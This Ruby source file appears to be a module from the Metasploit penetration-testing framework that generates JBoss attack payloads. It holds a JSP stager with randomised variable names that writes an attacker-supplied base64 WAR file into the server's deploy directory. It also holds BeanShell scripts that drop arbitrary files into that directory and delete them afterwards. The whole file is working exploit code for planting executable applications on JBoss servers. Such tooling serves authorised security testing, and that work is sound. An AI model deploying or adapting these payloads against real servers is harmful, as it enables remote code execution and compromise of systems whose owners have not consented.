106 lines
3.2 KiB
Ruby
106 lines
3.2 KiB
Ruby
# -*- coding: binary -*-
|
|
|
|
module Msf::HTTP::JBoss::BeanShellScripts
|
|
|
|
# Generates a Bean Shell Script.
|
|
#
|
|
# @param type [Symbol] The Bean Shell script type, `:create` or `:delete`.
|
|
# @param opts [Hash] Hash of configuration options.
|
|
# @return [String] A Bean Shell script.
|
|
def generate_bsh(type, opts ={})
|
|
bean_shell = nil
|
|
case type
|
|
when :create
|
|
bean_shell = create_file_bsh(opts)
|
|
when :delete
|
|
bean_shell = delete_files_bsh(opts)
|
|
end
|
|
|
|
bean_shell
|
|
end
|
|
|
|
# Generate a stager JSP to write a WAR file to the deploy/ directory.
|
|
# This is used to bypass the size limit for GET/HEAD requests.
|
|
#
|
|
# @param app_base [String] The name of the WAR app to write.
|
|
# @return [String] The JSP stager.
|
|
def stager_jsp(app_base)
|
|
decoded_var = Rex::Text.rand_text_alpha(8+rand(8))
|
|
file_path_var = Rex::Text.rand_text_alpha(8+rand(8))
|
|
jboss_home_var = Rex::Text.rand_text_alpha(8+rand(8))
|
|
fos_var = Rex::Text.rand_text_alpha(8+rand(8))
|
|
content_var = Rex::Text.rand_text_alpha(8+rand(8))
|
|
|
|
stager_jsp = <<-EOT
|
|
<%@page import="java.io.*,
|
|
java.util.*,
|
|
sun.misc.BASE64Decoder"
|
|
%>
|
|
<%
|
|
String #{jboss_home_var} = System.getProperty("jboss.server.home.dir");
|
|
String #{file_path_var} = #{jboss_home_var} + "/deploy/" + "#{app_base}.war";
|
|
try {
|
|
String #{content_var} = "";
|
|
String parameterName = (String)(request.getParameterNames().nextElement());
|
|
#{content_var} = request.getParameter(parameterName);
|
|
FileOutputStream #{fos_var} = new FileOutputStream(#{file_path_var});
|
|
byte[] #{decoded_var} = new BASE64Decoder().decodeBuffer(#{content_var});
|
|
#{fos_var}.write(#{decoded_var});
|
|
#{fos_var}.close();
|
|
}
|
|
catch(Exception e){ }
|
|
%>
|
|
EOT
|
|
|
|
stager_jsp
|
|
end
|
|
|
|
# Generate a Bean Shell script which creates files inside the JBOSS's deploy
|
|
# directory.
|
|
#
|
|
# @param opts [Hash] Hash containing the options to create the Bean Shell
|
|
# Script.
|
|
# @option opts :dir [Symbol] The dir where place the file.
|
|
# @option opts :file [Symbol] The file path.
|
|
# @option opts :contents [Symbol] The file contents.
|
|
# @return [String] A Bean Shell script to create the file.
|
|
def create_file_bsh(opts = {})
|
|
dir = opts[:dir]
|
|
file = opts[:file]
|
|
contents = opts[:contents]
|
|
|
|
payload_bsh_script = <<-EOT
|
|
import java.io.FileOutputStream;
|
|
import sun.misc.BASE64Decoder;
|
|
|
|
String val = "#{contents}";
|
|
|
|
BASE64Decoder decoder = new BASE64Decoder();
|
|
String jboss_home = System.getProperty("jboss.server.home.dir");
|
|
new File(jboss_home + "/deploy/#{dir}").mkdir();
|
|
byte[] byteval = decoder.decodeBuffer(val);
|
|
String location = jboss_home + "/deploy/#{file}";
|
|
FileOutputStream fstream = new FileOutputStream(location);
|
|
fstream.write(byteval);
|
|
fstream.close();
|
|
EOT
|
|
|
|
payload_bsh_script
|
|
end
|
|
|
|
# Generate a Bean Shell script to delete files from the JBoss's /deploy
|
|
# directory.
|
|
#
|
|
# @param opts [Hash] Hash containing the files to delete, the values are
|
|
# the files paths.
|
|
# @return [String] A Bean Shell script to delete files.
|
|
def delete_files_bsh(opts = {})
|
|
script = "String jboss_home = System.getProperty(\"jboss.server.home.dir\");\n"
|
|
opts.values.each do |v|
|
|
script << "new File(jboss_home + \"/deploy/#{v}\").delete();\n"
|
|
end
|
|
|
|
script
|
|
end
|
|
end
|